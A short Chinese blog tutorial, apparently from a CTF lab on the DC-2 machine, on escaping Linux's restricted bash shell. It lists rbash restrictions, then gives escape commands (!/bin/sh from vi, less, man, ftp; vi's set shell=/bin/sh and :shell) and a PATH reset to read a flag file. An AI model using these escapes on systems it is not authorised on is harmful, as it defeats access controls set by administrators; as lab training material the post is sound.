-
linux进行rbash逃逸的方法
目录
一、什么是rbash
受限shell是linux shell限制一些bash shell中的功能,并且是从名字上很清楚。该限制很好地显示了命令以及脚本在受限shell中运行。它为linux中的bash shell提供了一个额外的安全层。
不能使用cd命令;
不能设置或取消环境变量:SHELL,PATH,ENV,BASH_ENV;
导入功能受限;
指定包含参数’/’或’-’的文件名;
不能使用>,>|,<>,>&,&>,>>等重定向操作符;
不能使用’set +r’或者’set +o’关闭。
二、rbash逃逸
(一)rbash限制提示
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found
(二)rbash逃逸方法
利用系统常见应用逃逸,常见利用的命令如下。
ftp
more
less
man
vi
vim
以上在输入的地方输入!/bin/sh或!/bin/bash。
(三)利用vi命令进行rbash逃逸案例
1. vi flag3.txt文本文件
2. 输入英文冒号:
3. 在冒号后输入set shell=/bin/sh回车
4. 输入:shell调用/bin/sh
5. 逃逸成功
6. 设置命令路径变量
rbash逃逸之后,在shell中添加命令路径变量:
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin7. 验证cat flag3.txt
可以使用cat命令查看文件内容。
-
相关阅读:
GAT解读graph attention network
机器人技术概述_1.机器人的概念及定义和发展历程
centos、Fedora/Red Hat Enterprise Linux 和 Ubuntu/Debian
linux安装mysql8.0
进程相关介绍(二)
Unix Network Programming Episode 78
js农历与阳历转换使用笔记
关于Java NIO的的思考
北大肖臻老师《区块链技术与应用》系列课程学习笔记[7]比特币-分叉
WebSocket Day04 : 消息推送
- 原文地址:https://blog.csdn.net/u013930899/article/details/126815615